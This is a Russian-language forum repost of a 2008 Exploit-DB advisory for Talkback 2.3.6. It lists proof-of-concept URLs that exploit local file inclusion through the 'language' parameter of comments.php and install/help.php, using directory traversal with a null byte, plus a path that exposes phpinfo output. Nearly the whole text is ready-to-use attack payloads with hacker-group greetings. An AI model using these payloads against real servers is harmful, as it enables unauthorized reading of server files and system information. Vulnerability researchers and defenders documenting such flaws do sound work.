- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6451
- Проверка EDB
-
- Пройдено
- Автор
- SIRGOD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4346 cve-2008-4115
- Дата публикации
- 2008-09-13
Код:
############################################################################################################
[+] Talkback 2.3.6 Multiple Local File Inclusion/PHPInfo Disclosure
[+] Discovered By SirGod
[+] MorTal TeaM
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
############################################################################################################
[+] Local File Inclusion
PoC 1 :
http://[target]/[path]/comments.php?language=[Local File]%00
Example 1 :
http://127.0.0.1/talkback/comments.php?language=../../../../autoexec.bat%00
PoC 2 :
http://[target]/[path]/install/help.php?language=[Local File]%00
Example 2 :
http://127.0.0.1/talkback/install/help.php?language=../../../../../autoexec.bat%00
[+] PHPInfo Disclosure
PoC:
http://[target]/[path]/install/info.php
Example :
http://127.0.0.1/talkback/install/info.php
##############################################################################################################
# milw0rm.com [2008-09-13]- Источник
- www.exploit-db.com
